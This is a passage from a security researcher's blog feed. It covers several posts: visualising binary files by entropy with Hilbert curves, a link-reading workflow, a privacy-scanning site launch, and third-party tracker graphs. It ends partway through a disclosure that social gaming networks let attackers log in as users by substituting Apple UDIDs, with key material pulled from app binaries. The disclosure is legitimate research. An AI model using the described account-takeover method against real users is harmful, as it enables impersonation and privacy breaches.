<a href="0fc12afe2d283b92184897b6e7bcc2c2.html">
<img class="entropy" src='small_0fc12afe2d283b92184897b6e7bcc2c2_entropy.png'/>
<img class="charclass" src='small_0fc12afe2d283b92184897b6e7bcc2c2_charclass.png'/>
</a>
</td>
<td>
<a href="12eec9b3e0aa2e6683487c13eede2382.html">
<img class="entropy" src='small_12eec9b3e0aa2e6683487c13eede2382_entropy.png'/>
<img class="charclass" src='small_12eec9b3e0aa2e6683487c13eede2382_charclass.png'/>
</a>
</td>
<td>
<a href="0d97f71367f8b6dcb8cbc8ec964ebdbe.html">
<img class="entropy" src='small_0d97f71367f8b6dcb8cbc8ec964ebdbe_entropy.png'/>
<img class="charclass" src='small_0d97f71367f8b6dcb8cbc8ec964ebdbe_charclass.png'/>
</a>
</td>
<td>
<a href="18f9ede7d921742f963a0eb06887fdfa.html">
<img class="entropy" src='small_18f9ede7d921742f963a0eb06887fdfa_entropy.png'/>
<img class="charclass" src='small_18f9ede7d921742f963a0eb06887fdfa_charclass.png'/>
</a>
</td>
</tr><tr>
<td>
<a href="16c533cc9b3dac1bde9885b4bd967bff.html">
<img class="entropy" src='small_16c533cc9b3dac1bde9885b4bd967bff_entropy.png'/>
<img class="charclass" src='small_16c533cc9b3dac1bde9885b4bd967bff_charclass.png'/>
</a>
</td>
<td>
<a href="0eab36fc4307a1fd3ad8d832c526cf40.html">
<img class="entropy" src='small_0eab36fc4307a1fd3ad8d832c526cf40_entropy.png'/>
<img class="charclass" src='small_0eab36fc4307a1fd3ad8d832c526cf40_charclass.png'/>
</a>
</td>
<td>
<a href="17fa099ecef82edd1e4ddc61be575ae4.html">
<img class="entropy" src='small_17fa099ecef82edd1e4ddc61be575ae4_entropy.png'/>
<img class="charclass" src='small_17fa099ecef82edd1e4ddc61be575ae4_charclass.png'/>
</a>
</td>
<td>
<a href="07ddb50c4cc358fc3718847684ca5fae.html">
<img class="entropy" src='small_07ddb50c4cc358fc3718847684ca5fae_entropy.png'/>
<img class="charclass" src='small_07ddb50c4cc358fc3718847684ca5fae_charclass.png'/>
</a>
</td>
<td>
<a href="04fee7e6dedf912b4a72886486627b05.html">
<img class="entropy" src='small_04fee7e6dedf912b4a72886486627b05_entropy.png'/>
<img class="charclass" src='small_04fee7e6dedf912b4a72886486627b05_charclass.png'/>
</a>
</td>
</tr>
</table>
<p>Clicking will show you high-detail versions of both visualizations, and let you
look up the binary hash to see what it is. I've used a square Hilbert curve
layout - the files start in the top-left corner, and pass through the quadrants
clockwise.</p>
<p>I spent hours looking through thousands these visualizations today. I find them
eerie and rather beautiful - an entirely different perspective from my
day-to-day interactions with malware.</p>
Visualizing entropy in binary files
2012-01-04T00:00:00+00:00
2012-01-04T00:00:00+00:00
https://corte.si/posts/visualisation/entropy/
<p><b>Edit: Since this post, I've created an interactive tool for binary
visualisation - see it at <a href="http://binvis.io">binvis.io</a></b></p>
<p>Last week, I wrote about <a href="https://corte.si/posts/visualisation/binvis/">visualizing binary files using space-filling
curves</a>, a technique I use when I need to
get a quick overview of the broad structure of a file. Today, I'll show you an
elaboration of the same basic idea - still based on space-filling curves, but
this time using a colour function that measures local entropy.</p>
<p>Before I get to the details, let's quickly talk about the motivation for a
visualization like this. We can think of entropy as the degree to which a chunk
of data is disordered. If we have a data set where all the elements have the
same value, the amount of disorder is nil, and the entropy is zero. If the data
set has the maximum amount of heterogeneity (i.e. all possible symbols are
represented equally), then we also have the maximum amount of disorder, and thus
the maximum amount of entropy. There are two common types of high-entropy data
that are of special interest to reverse engineers and penetration testers. The
first is compressed data - finding and extracting compressed sections is a
common task in many security audits. The second is cryptographic material -
which is obviously at the heart of most security work. Here, I'm referring not
only to key material and certificates, but also to hashes and actual encrypted
data. As I show below, a tool like the one I'm describing today can be highly
useful in spotting this type of information.</p>
<p>For this visualization, I use the <a href="http://en.wikipedia.org/wiki/Entropy_(information_theory)">Shannon
entropy</a> measure to
calculate byte entropy over a sliding window. This gives us a "local entropy"
value for each byte, even though the concept doesn't really apply to single
symbols.</p>
<p>With that out of the way, let's look at some pretty pictures.</p>
<h2 id="visualizing-the-osx-ksh-binary">Visualizing the OSX ksh binary</h2>
<p>In my previous post, I used the <a href="http://en.wikipedia.org/wiki/Korn_shell">ksh</a>
binary as a guinea pig, and I'll do the same here. On the left is the entropy
visualization with colours ranging from black for zero entropy, through shades
of blue as entropy increases, to hot pink for maximum entropy. On the right is
the Hilbert curve visualization from the last post for comparison - see <a href="https://corte.si/posts/visualisation/binvis/">the
post itself</a> for an explanation of the
colour scheme. Click for larger versions with much more detail:</p>
<div class="media">
<a href="hilbert-entropy-large.png">
<img src="hilbert-entropy.png" />
</a>
<div class="subtitle">
entropy
</div>
</div>
<div class="media">
<a href="../binvis/binary-large-hilbert.png">
<img src="../binvis/binary-hilbert.png" />
</a>
<div class="subtitle">
byte class
</div>
</div>
<p>Note that this is a dual-architecture
<a href="http://en.wikipedia.org/wiki/Mach-O">Mach-O</a> file, containing code for both
i386 and x86_64. You can see this if you squint somewhat at these images - some
broad structures in the file are repeated twice. We can see that there are a
number of different sections of the <strong>ksh</strong> binary that have very high entropy.
It's not immediately obvious why a system binary would contain either
compressed sections or cryptographic material. As it happens, the explanation
in this case is quite interesting. Let's have a closer look:</p>
<div class="media">
<a href="entropy-annotated.png">
<img src="entropy-annotated.png" />
</a>
</div>
<p>Sections <strong>1</strong> and <strong>2</strong> are a lovely validation of the central idea of this
post. These two areas do indeed contain cryptographic material - in this case,
<a href="http://developer.apple.com/library/mac/#technotes/tn2206/_index.html">code signing hashes and
certificates</a>.
Rather satisfyingly, they stand out like a sore thumb. It turns out that all of
the official OSX binaries are signed by Apple. This is then used in turn to
apply <a href="http://developer.apple.com/library/mac/#technotes/tn2206/_index.html">a variety of
policies</a>,
depending on who the signatory is, and whether they are trusted.</p>
<p>You can dump some rudimentary data about a binary's signature using the
<strong>codesign</strong> command (which you can also use to sign binaries yourself):</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">> codesign -dvv /bin/ksh
Executable=/bin/ksh
Identifier=com.apple.ksh
Format=Mach-O universal (i386 x86_64)
CodeDirectory v=20100 size=5662 flags=0x0(none) hashes=278+2 location=embedded
Signature size=4064
Authority=Software Signing
Authority=Apple Code Signing Certification Authority
Authority=Apple Root CA
Info.plist=not bound
Sealed Resources=none
Internal requirements count=1 size=92
</span></code></pre>
<p>Section <strong>3</strong> (the two occurrences are the same data repeated for each
architecture) is interesting for a different reason - it's a cautionary example
of how the simple entropy measure we're using sometimes detects high entropy in
highly structured data. A hex dump of the start of the region looks like this:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">000d1f00 00 01 00 00 00 02 00 00 00 06 00 00 00 00 00 00 |................|
000d1f10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000d1f20 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f |................|
000d1f30 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f |................|
000d1f40 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f | !"#$%&'()*+,-./|
000d1f50 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f |0123456789:;<=>?|
000d1f60 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f |@ABCDEFGHIJKLMNO|
000d1f70 50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f |PQRSTUVWXYZ[\]^_|
000d1f80 60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f |`abcdefghijklmno|
000d1f90 70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f |pqrstuvwxyz{|}~.|
000d1fa0 80 81 82 83 84 85 86 87 88 89 8a 8b 8c 8d 8e 8f |................|
000d1fb0 90 91 92 93 94 95 96 97 98 99 9a 9b 9c 9d 9e 9f |................|
000d1fc0 a0 a1 a2 a3 a4 a5 a6 a7 a8 a9 aa ab ac ad ae af |................|
000d1fd0 b0 b1 b2 b3 b4 b5 b6 b7 b8 b9 ba bb bc bd be bf |................|
000d1fe0 c0 c1 c2 c3 c4 c5 c6 c7 c8 c9 ca cb cc cd ce cf |................|
000d1ff0 d0 d1 d2 d3 d4 d5 d6 d7 d8 d9 da db dc dd de df |................|
000d2000 e0 e1 e2 e3 e4 e5 e6 e7 e8 e9 ea eb ec ed ee ef |................|
000d2010 f0 f1 f2 f3 f4 f5 f6 f7 f8 f9 fa fb fc fd fe ff |................|
</span></code></pre>
<p>We see that this section contains each byte value from 0x00 to 0xff in order -
furthermore this whole block is repeated with minor variations a number of
times. There are two things to explain here - why is this detected as "high
entropy" data, and what the heck is it doing in the file?</p>
<p>First, we need to understand that the Shannon entropy measure looks only at the
relative occurrence frequencies of individual symbols (in this case, bytes). A
chunk of data like the one above therefore looks like it has high entropy,
because each symbol occurs once and only once, making the data highly
heterogeneous.</p>
<p>Now, what earthly use would chunks of data like this be? With a bit of digging,
I found the answer in the <strong>ksh</strong> source code. These sections are maps used for
translation between various <a href="http://en.wikipedia.org/wiki/EBCDIC">character</a>
<a href="http://en.wikipedia.org/wiki/ASCII">encodings</a>. If you're interested, here's
the <a href="http://opensource.apple.com/source/ksh/ksh-13/ksh/src/lib/libast/string/ccmap.c">culprit in all its repetitive
glory</a>.</p>
<h2 id="the-code">The code</h2>
<p>As usual, the code for generating all of the images in this post is up on
GitHub. The entropy visualizations were created with
<a href="https://github.com/cortesi/scurve/blob/master/binvis">binvis</a>, a new addition
to <a href="https://github.com/cortesi/scurve">scurve</a>, my compendium of code related
to space-filling curves.</p>
A personal link mill
2011-12-30T00:00:00+00:00
2011-12-30T00:00:00+00:00
https://corte.si/posts/socialmedia/linkmill/
<p>I posted a link to an interesting visualization paper on Twitter today,
<a href="https://twitter.com/#!/__mharrison__/status/152503684822081537">prompting someone to ask me where I had found
it</a>. Sadly, I
had to admit that I had no clue where I first saw it referenced, due to the way
I consume links I find on the net. So, I thought I'd write a quick blog post to
explain myself, and then pitch a product idea that could make my life (and maybe
yours) much easier.</p>
<p>First, the problem statement: my aim is to efficiently discover links to
interesting stuff on the net. Simple as that. A few years ago, my flow of links
came mostly from social news sites (<a href="http://news.ycombinator.com">Hacker News</a>
and <a href="http://reddit.com">Reddit</a>), and items shared by people I follow on social
networks. Over time, I became more and more disenchanted with this way of doing
things. The social news approach is to take a torrent of very low quality links
(user submissions), and then crowd-source the filtration process through voting.
But popularity is not a good measure of information quality, and the result is a
bland, lowest-common-denominator view of the world that has no room for anything
that doesn't make it to the front page. Don't get me wrong - Reddit and HN do a
lot of other things well - but they just don't cut it as primary information
sources. Mining links from social networks is a more promising approach, but
still problematic. None of the social networks provide the tools needed to
extract shared links from the update stream and consume them efficiently. There
is also a structural issue - I don't necessarily want to mix my social ties and
my information sources, and I definitely don't want to be limited to just one
platform. These are separate functions that I feel require separate tools.</p>
<h2 id="my-personal-link-mill">My personal link mill</h2>
<p>Eventually, I took matters into my own hands. First, I hugely broadened the
number of information sources I consumed. The tool I use for this is Google
Reader - I now subscribe to about 800 individual feeds, and this number is
growing daily. The trick here is to find high-quality, low-volume link sources.
The motherlode of good links for me was to be found on social bookmarking sites.
About 700 of my subscriptions are to the RSS feeds of individual users on
<a href="http://pinboard.in">Pinboard</a> and <a href="http://delicious.com">Delicious</a>. This gives
me very fine control and a great mix of interests. Plus, getting links from
individual curators handily sidesteps the social news group-think problem. The
remainder of my subscriptions are split between blogs, some sub-Reddits, a few
Twitter users and subsections of <a href="http://arxiv.org">arXiv</a>.</p>
<p>So much for how my intake works. Just as important is the way that I consume
it. I do my "filtering" in batches, usually in the evening. Using
<a href="http://reederapp.com/">Reeder</a> on my iPad works well for me, letting me flick
#quickly and comfortably through all the new links of the day. When I find
something that looks interesting, I resist the temptation to read it then and
there - instead, I batch up all my reading for later. If it's a web page, it
goes to <a href="http://www.instapaper.com/">Instapaper</a>. If it's a PDF, it gets
downloaded into a <a href="http://www.dropbox.com/">DropBox</a> folder, which is synced to
<a href="http://www.goodiware.com/goodreader.html">GoodReader</a>.</p>
<p>Finally, the actual reading. Every morning, I toddle off to a nice cafe with my
iPad, and read all the interesting stuff I saved the previous day in a single
sitting. I'm ruthless about just skimming things that don't warrant careful
attention. If I find something particularly interesting I save it permanently,
and perhaps tweet it or mail it to someone I think might be interested.</p>
<h2 id="problems-and-a-product-idea">Problems - and a product idea?</h2>
<p>This system works for me, but it has many problems. There's no end-to-end
coordination, so by the time I sit down to actually read something, I have no
easy way to tell which feed it came from. Google Reader sucks at managing
hundreds of low-volume subscriptions. Reeder is a great, but is not tailored to
consuming redundant information from many sources. The end result is that
maintaining the system I have is a time-consuming pain in the ass. The fact
that it's still worth it despite this, makes me think there might be commercial
room for a better solution.</p>
<p>Which brings me to a rough product idea - a formalized version of this link
mill for people who want to take direct control of their information intake.
The business end is a generalized feed consumer, letting you subscribe to RSS
feeds, Twitter users, Google+ updates, sub-Reddits and other information
sources. Links are extracted from these feeds, keeping track of which links
appeared where. The user is then presented with a stream of links to consume,
de-duplicated so that those appearing in multiple feeds are presented only
once. The system keeps track of links the user marks as "interesting", batching
them for later consumption. It also uses this information to score the feeds,
letting the user see which feeds are low quality, and should be ditched. Given
the right tools, the time needed for a user to maintain and tend their link
feed garden would be quite modest, and the rewards would be great.</p>
<p>If someone built this, I for one would gladly fork over some of my hard-earned
doubloons to use it. In fact, with some validation of the idea and a few
collaborators I might think of building it myself. Does this sound useful to
anyone else?</p>
Visualizing binaries with space-filling curves
2011-12-23T00:00:00+00:00
2011-12-23T00:00:00+00:00
https://corte.si/posts/visualisation/binvis/
<p><b>Edit: Since this post, I've created an interactive tool for binary
visualisation - see it at <a href="http://binvis.io">binvis.io</a></b></p>
<p>In my day job I often come across binary files with unknown content. I have a
set of standard avenues of attack when I confront such a beast - use "file" to
see if it's a known file type, "strings" to see if there's readable text, run
some in-house code to extract compressed sections, and, of course, fire up a hex
editor to take a direct look. There's something missing in that list, though - I
have no way to get a quick view of the overall structure of the file. Using a
hex editor for this is not much chop - if the first section of the file looks
random (i.e. probably compressed or encrypted), who's to say that there isn't a
chunk of non-random information a meg further down? Ideally, we want to do this
type of broad pattern-finding by eye, so a visualization seems to be in order.</p>
<p>First, lets begin by picking a colour scheme. We have 256 different byte values,
but for a first-pass look at a file, we can compress that down into a few common
classes:</p>
<table>
<tr>
<td style="background-color: #000000"> </td>
<td>0x00</td>
</tr>
<tr>
<td style="background-color: #ffffff"> </td>
<td>0xFF</td>
</tr>
<tr>
<td style="background-color: #377eb8"> </td>
<td>Printable characters</td>
</tr>
<tr>
<td style="background-color: #e41a1c"> </td>
<td>Everything else</td>
</tr>
</table>
<p>This covers the most common padding bytes, nicely highlights strings, and lumps
everything else into a miscellaneous bucket. The broad outline of what we need
to do next is clear - we sample the file at regular intervals, translate each
sampled byte to a colour, and write the corresponding pixel to our image. This
brings us to the big question - what's the best way to arrange the pixels? A
first stab might be to lay the pixels out row by row, snaking to and fro to make
sure each pixel is always adjacent to its predecessor. It turns out, however,
that this zig-zag pattern is not very satisfying - small scale features (i.e.
features that take up only a few lines) tend to get lost. What we want is a
layout that maps our one-dimensional sequence of samples onto the 2-d image,
while keeping elements that are close together in one dimension as near as
possible to each other in two dimensions. This is called "locality
preservation", and the <a href="http://en.wikipedia.org/wiki/Space-filling_curve">space-filling
curves</a> are a family of
mathematical constructs that have precisely this property. If you're a regular
reader of this blog, you may know that I have an
<a href="https://corte.si/posts/code/hilbert/portrait/">almost</a>
<a href="https://corte.si/posts/code/sortvis-fruitsalad/">unseemly</a>
<a href="https://corte.si/posts/code/hilbert/swatches/">fondness</a> for these critters. So, lets
add a couple of space-filling curves to the mix to see how they stack up. The
<a href="http://en.wikipedia.org/wiki/Z-order_curve">Z-Order curve</a> has found wide
practical use in computer science. It's not the best in terms of locality
preservation, but it's easy and quick to compute. The <a href="http://en.wikipedia.org/wiki/Hilbert_curve">Hilbert
curve</a>, on the other hand, is
(nearly) as good as it gets at locality preservation, but is much more
complicated to generate. Here's what our three candidate curves look like - in
each case, the traversal starts in the top-left corner:</p>
<div class="container">
<div class="row">
<div class="column">
<img src="zigzag.png"/>
<h4>Zigzag</h4>
</div>
<div class="column">
<img src="zorder.png"/>
<h4>Z-order</h4>
</div>
<div class="column">
<img src="hilbert.png"/>
<h4>Hilbert</h4>
</div>
</div>
</div>
<p>And here they are, visualizing the
<a href="http://en.wikipedia.org/wiki/Korn_shell">ksh</a>
(<a href="http://en.wikipedia.org/wiki/Mach-O">Mach-O</a>,
<a href="http://en.wikipedia.org/wiki/Fat_binary">dual-architecture</a>) binary
distributed with OSX - click for the significantly more spectacular larger
versions of the images:</p>
<div class="container">
<div class="row">
<div class="column">
<a href="binary-large-zigzag.png"><img src="binary-zigzag.png"/></a>
<h4>Zigzag</h4>
</div>
<div class="column">
<a href="binary-large-zorder.png"><img src="binary-zorder.png"/></a>
<h4>Z-order</h4>
</div>
<div class="column">
<a href="binary-large-hilbert.png"><img src="binary-hilbert.png"/></a>
<h4>Hilbert</h4>
</div>
</div>
</div>
<p>The classical Hilbert and Z-Order curves are actually square, so for these
visualizations I've unrolled them, stacking four sub-curves on top of each
other. To my eye, the Hilbert curve is the clear winner here. Local features
are prominent because they are nicely clumped together. The Z-order curve shows
some annoying artifacts with contiguous chunks of data sometimes split between
two or more visual blocks.</p>
<p>The downside of the space-filling curve visualizations is that we can't look at
a feature in the image and tell where, exactly, it can be found in the file.
I'm toying with the idea (though not very seriously) of writing an interactive
binary file viewer with a space-filling curve navigation pane. This would let
the user click on or hover over a patch of structure and see the file offset
and the corresponding hex.</p>
<h2 id="more-detail">More detail</h2>
<p>We can get more detail in these images by increasing the granularity of the
colour mapping. One way to do this is to use a trick I first concocted to
<a href="https://corte.si/posts/code/hilbert/portrait/">visualize the Hilbert Curve at
scale</a>. The basic idea is to use a
3-d Hilbert curve traversal of the RGB colour cube to create a palette of
colours. This makes use of the locality-preserving properties of the Hilbert
curve to make sure that similar elements have similar colours in the
visualization. See the <a href="https://corte.si/posts/code/hilbert/portrait/">original
post</a> for more.</p>
<p>So, here's a Hilbert curve mapping of a binary file, using a Hilbert-order
traversal of the RGB cube as a colour palette. Again, click on the image for
the much nicer large scale version:</p>
<div class="media">
<a href="hilbert-hilbert-large.png">
<img src="hilbert-hilbert.png" />
</a>
</div>
<p>This shows significantly more fine-grained structure, which might be good for a
deep dive into a binary. On the other hand, the colours don't map cleanly to
distinct byte classes, so the image is harder to interpret. An ideal hex viewer
would let you flick between the two palettes for navigation.</p>
<h2 id="the-code">The code</h2>
<p>As usual, I'm publishing the code for generating all of the images in this
post. The binary visualizations were created with
<a href="https://github.com/cortesi/scurve/blob/master/binvis">binvis</a>, which is a new
addition to <a href="https://github.com/cortesi/scurve">scurve</a>, my space-filling curve
project. The curve diagrams were made with the "drawcurve" utility to be found
in the same place.</p>
netograph.com - Realtime privacy snapshots of the social web
2011-12-08T00:00:00+00:00
2011-12-08T00:00:00+00:00
https://corte.si/posts/netograph/launch/
<p>Today, I'm launching <a href="http://netograph.com">Netograph</a>, a new privacy-related
site that I've been hacking on over the past few months. The goal of the project
is to provide you with a quick overview of the privacy picture for a URL,
<strong>before</strong> you've clicked on the link. At the moment, Netograph scans
<a href="http://reddit.com">Reddit</a>, <a href="http://news.ycombinator.com">Hacker News</a>,
<a href="http://pinboard.in">Pinboard</a>, <a href="http://delicous.com">Delicous</a> and
<a href="http://digg.com">Digg</a> - links on these sites should show up within a few
minutes of submission.</p>
<p>For more details, head over to <a href="http://netograph.com">netograph.com</a>. There you
will also find
<a href="https://addons.mozilla.org/en-US/firefox/addon/netograph/">Firefox</a> and
<a href="https://chrome.google.com/webstore/detail/bfhmbldbigkpniinkmckafbgcajcbaai">Chrome</a>
browser addons that let you view the Netograph report for a URL instantly with a
right-click. Enjoy!</p>
<div class="container">
<div class="row">
<div class="column">
<a href="http://netograph.com/starmap/1740">
<img src="ng-guardian.png">
guardian.co.uk
</a>
</div>
<div class="column">
<a href="http://netograph.com/starmap/2512">
<img src="ng-techcrunch.png">
techcrunch.com
</a>
</div>
<div class="column">
<a href="http://netograph.com/starmap/2457">
<img src="ng-reddit.png">
reddit.com
</a>
</div>
</div>
</div>
<h2 id="what-s-next">What's next?</h2>
<p>This is just the first step. As I hinted in a <a href="https://corte.si/posts/privacy/neighbourhoods-of-trust/">previous
post</a>, the most interesting
results from Netograph are likely to come from aggregating and
cross-correlating the data for individual URLs. I'm already hard at work on
this - the next iteration of Netograph will aim to shine some light on the
sometimes shadowy network of third-parties that track and analyze nearly every
URL we visit. I will also be publishing some interesting tidbits from this data
corpus on my blog as I go along, so watch this space.</p>
Otago Polytechnic Talk
2011-10-31T00:00:00+00:00
2011-10-31T00:00:00+00:00
https://corte.si/posts/talks/polytech/
<p>Further reading for the guest lecture I'm giving at Otago Polytechnic today:</p>
<ul>
<li>The talk I'm not giving: <a href="https://www.owasp.org/index.php/Top_10_2010-Main">OWASP Top
10</a></li>
<li>Tools: <a href="http://getfirebug.com/">FireBug</a>,
<a href="https://addons.mozilla.org/en-US/firefox/addon/tamper-data/">TamperData</a>,
<a href="http://python.org">Python</a>.</li>
<li>The <a href="http://en.wikipedia.org/wiki/Samy_(XSS)">Myspace Worm</a>, and
Samy Kamkar's <a href="http://namb.la/popular/tech.html">own explanation of the
exploit</a>.</li>
<li>Halvar Flake's <a href="http://www.immunityinc.com/infiltrate/2011/presentations/Fundamentals_of_exploitation_revisited.pdf">Programming and state
machines</a>,
which is where I first saw the term "programming the weird machine".</li>
</ul>
Neighborhoods of trust on the web
2011-09-27T00:00:00+00:00
2011-09-27T00:00:00+00:00
https://corte.si/posts/privacy/neighbourhoods-of-trust/
<p>For the last fortnight I've been hard at work on a new project that aims to
examine trust and security on the web at scale. The basic idea is to use a
browser instance to render a URL, and then to extract all persistent state with
browser forensic techniques afterwards. This gives you a dump of cookies, cache
contents, Flash storage, HTML5 databases, and so on. At the same time, all
traffic is routed through a specialised version of
<a href="http://mitmproxy.org">mitmproxy</a>, and captured for later analysis. The result
is a very detailed snapshot of what viewing a given URL actually <em>does</em>. The
next step is to do this "at scale" - this means running many instances of this
process in parallel on headless servers, decoupling things using queues, backing
it all onto a database, and then spending days and days fine-tuning. I'm happy
with my progress so far - my infrastructure is now now scanning all the URLs
passing through <a href="http://news.ycombinator.com">Hacker News</a>,
<a href="http://reddit.com">Reddit</a>, <a href="http://digg.com">Digg</a>,
<a href="http://delicious.com">Delicious</a> and <a href="http://pinboard.in">Pinboard</a> in
realtime, without breaking a sweat.</p>
<p>I am pretty excited about the possibilities for this project, and I'm exploring
plans for the future with like-minded security folk. Get in touch if this
interests you, and keep an eye on my blog for more news.</p>
<p>After my pilot run, I had 150 gigs of data covering about 120 thousand URLs.
Below is a quick peek at one tiny slice of this data - an appetizer for things
to come.</p>
<h2 id="neighborhoods-of-trust">Neighborhoods of trust</h2>
<div class="media">
<a href="full.png">
<img src="wholegraph.png" />
</a>
</div>
<p>This graph shows structures that emerge from the way sites use third-party
executable resources. In this context, "executable" means means JavaScript,
Flash and HTML, and "third-party" means domains other than the URL's own. The
nodes in this graph are the third-party domains, and the edges are associations
between them via the URLs I crawled. For example, if a site loaded scripts from
both Google Analytics and from Doubleclick, that would create (or reinforce) an
edge between the nodes "google-analytics.com" and "doubleclick.com". Using
this data, I calculated a co-occurrence coefficient for the third-party
sources, and then extracted the resulting neighbourhood structures
<a href="http://lanl.arxiv.org/abs/0803.0476">algorithmically</a>. The neighbourhood
information was used to colour and lay out the graph, trying to keep nodes that
are closely correlated together. Finally, nodes are scaled based on how many
URLs reference them.</p>
<p>The result is a rather stunning graph showing neighborhoods of trust - areas of
the Internet bound together based on the third parties allowed to run code in
users' browsers. I've spent a few hours playing with this data, and the sheer
range of interesting structure is surprising. At one end of the spectrum, you
can zoom in to the individual node relationships, and find small clusters of
surprising sites that cross-load resources from each other, often because they
are owned by the same entity. At the other end, countries, language groups, and
broad fields of interest aggregate in huge tribes of kinship.</p>
<p>Here are a few of the larger-scale features from the graph.</p>
<h3 id="mainstream">Mainstream</h3>
<div class="media">
<a href="wholegraph-b.png">
<img src="wholegraph-b.png" />
</a>
</div>
<p>The most widely used resources dominate in the neighbourhood
extraction algorithm, which causes them to cluster together in
their own super-community. The top nodes in this cluster,
descending order of occurrence are: google-analytics.com,
facebook.com, doubleclick.net, fbcdn.net, quantserve.com,
twitter.com, google.com, googlesyndication.com, googleapis.com,
scorecardresearch.net, facebook.net, addthis.com. These are
also the top nodes overall.</p>
<h3 id="japanese">Japanese</h3>
<div class="media">
<a href="wholegraph-a.png">
<img src="wholegraph-a.png" />
</a>
</div>
<p>The main resources are hatena.ne.jp, microad.jp, mixi.jp,
yahoo.co.jp, nakanohito.jp. More surprisingly, also in this cluster
are topsy.com, appspot.com and postrank.com. Perhaps these
resources are especially commonly used on Japanese sites.</p>
<h3 id="russian">Russian</h3>
<div class="media">
<a href="wholegraph-d.png">
<img src="wholegraph-d.png" />
</a>
</div>
<p>Top resources are yadro.ru, yandex.ru, rambler.ru, vkontakte.ru,
openstat.net, userapi.com, shinystat.net, and dt00.net</p>
<h3 id="porn">Porn</h3>
<div class="media">
<a href="wholegraph-c.png">
<img src="wholegraph-c.png" />
</a>
</div>
<p>And here we have a portion of the web dedicated to porn. The top
resources are awempire.com, clickbank.net, picadmedia.com,
getresponse.com, adultfriendfinder.com, adultadword.com, phcdn.com,
juicyads.com, brazzers.com, etology.com, data-ero-advertising.com
and viddler.com. A more surprising inclusion in this group is
wufoo.com - I wonder if this is an artifact, or whether Wufoo
really does have a use in the adult content world.</p>
<h3 id="misc">Misc</h3>
<div class="media">
<a href="wholegraph-e.png">
<img src="wholegraph-e.png" />
</a>
</div>
<p>Just to show that it's not all clear-cut, here's an example of a
neighbourhood I find harder to explain. The top resources are
netdna-cdn.com, amgdgt.com, trafficmp.com, ooyala.com,
suitesmart.com, demdex.net, adfrontiers.com, lycos.com and
break.com. I speculate that this group might be loosely aligned
around a number of big CDNs and analysis suites.</p>
<h2 id="tech">Tech</h2>
<p>The graph in this post was created, analyzed and pre-processed using
<a href="http://projects.skewed.de/graph-tool/">graph-tool</a>, a great Python library for
dealing with large graphs. The visualization and modularity analysis was done
using the ever-wonderful <a href="http://gephi.org/">Gephi</a>. If these aren't both in
your arsenal of analysis tools, you're missing out.</p>
Why the Apple UDID had to die
2011-09-09T00:00:00+00:00
2011-09-09T00:00:00+00:00
https://corte.si/posts/security/udid-must-die/
<p><strong>EDIT: A <a href="http://blogs.wsj.com/digits/2011/09/19/privacy-risk-found-on-cellphone-games/">WSJ Digits
article</a>
is now up, containing a responses from Zynga and Chillingo. Other networks
declined to comment.</strong></p>
<p>A UDID is a "Unique Device Identifier" - you can think of it as a serial number
burned permanently into every iPhone, iPad and iPod Touch. Any installed app can
access the UDID without requiring the user's knowledge or consent. We know that
UDIDs are very widely used - in a sample of 94 apps I tested, <a href="https://corte.si/posts/security/apple-udid-survey/">74% silently sent
the UDID to one or more servers on the
Internet</a>, often without
encryption. This means that UDIDs are not secret values - if you use an Apple
device regularly, it's certain that your UDID has found its way into scores of
databases you're entirely unaware of. Developers often assume UDIDs are
anonymous values, and routinely use them to aggregate detailed and sensitive
user behavioural information. One example is Flurry, a mobile analytics firm
used by 15% of apps I tested, which can monitor application startup, shutdown,
scores achieved, and a host of other application-specific events, all linked to
the user's UDID. I recently showed that it was possible to use
<a href="http://en.wikipedia.org/wiki/OpenFeint">OpenFeint</a>, a large mobile social
gaming network, to <a href="https://corte.si/posts/security/openfeint-udid-deanonymization/">de-anonymize
UDIDs</a>, linking them
to usernames, email addresses, GPS locations, and even Facebook profiles.</p>
<p>This post looks at the way UDIDs are used in the broader social gaming
ecosystem. The work is based on a simple question: what happens if we swap our
UDID for another while communicating with the network? There are a number of
ways to do this - in my case I used <a href="http://mitmproxy.org">mitmproxy</a>, an
intercepting HTTP/S proxy I developed which lets me re-write the traffic leaving
a device on the fly. In most cases this was a simple matter of replacing one
string with another, but two networks (Scoreloop and Crystal) prevented UDID
substitution using cryptography. Unfortunately, both networks relied on the
secrecy of key material distributed in the application binaries to every device.
I have verified that it is possible to reverse engineer the application binaries
to extract the key material and circumvent the cryptographic protection.</p>
<p>The outcome of this experiment shows that social gaming networks systematically
misuse UDIDs, resulting in serious privacy breaches for their users. All the
networks I tested allowed UDIDs to be linked to potentially identifying user
information, ranging from usernames to email addresses, friends lists and
private messages. Furthermore, 5 of the 7 networks allow an attacker to log in
as a user using only their UDID, giving the attacker complete control of the
user's account. Two networks had further problems that compromised a user's
Facebook and Twitter accounts - Crystal lets an attacker take control of a user
accounts by leaking API keys, while Scoreloop partially discloses users' friends
lists, even if they are private.</p>
<style>
.yes {
background-color: #d55858;
color: #000000;
}
.no {
background-color: #5bd65b;
color: #000000;
}
</style>
<table>
<tr>
<th></th>
<th>Data leaked</th>
<th>Login as user</th>
<th>Social Media Accounts</th>
</tr>
<tr>
<th><a href="http://www.chillingo.com/">Crystal</a></th>
<td class="yes"> Username, friends, Facebook, Twitter, games played, location, email address </td>
<td class="yes"> Yes </td>
<td class="yes"> Control of Facebook, Twitter accounts</td>
</tr>
<tr>
<th><a href="http://www.gameloft.com/">GameLoft</a></th>
<td class="yes"> Username, email address, games played, nationality, friends </td>
<td class="yes"> Yes </td>
<td class="no"> No </td>
</tr>
<tr>
<th><a href="http://www.geocade.com/">Geocade</a></th>
<td class="yes"> Username, email address, games played, location </td>
<td class="yes"> Yes </td>
<td class="no"> No </td>
</tr>
<tr>
<th><a href="http://openfeint.com/">OpenFeint</a></th>
<td class="yes"> Username, last played game, online status, friends </td>
<td class="yes"> Yes </td>
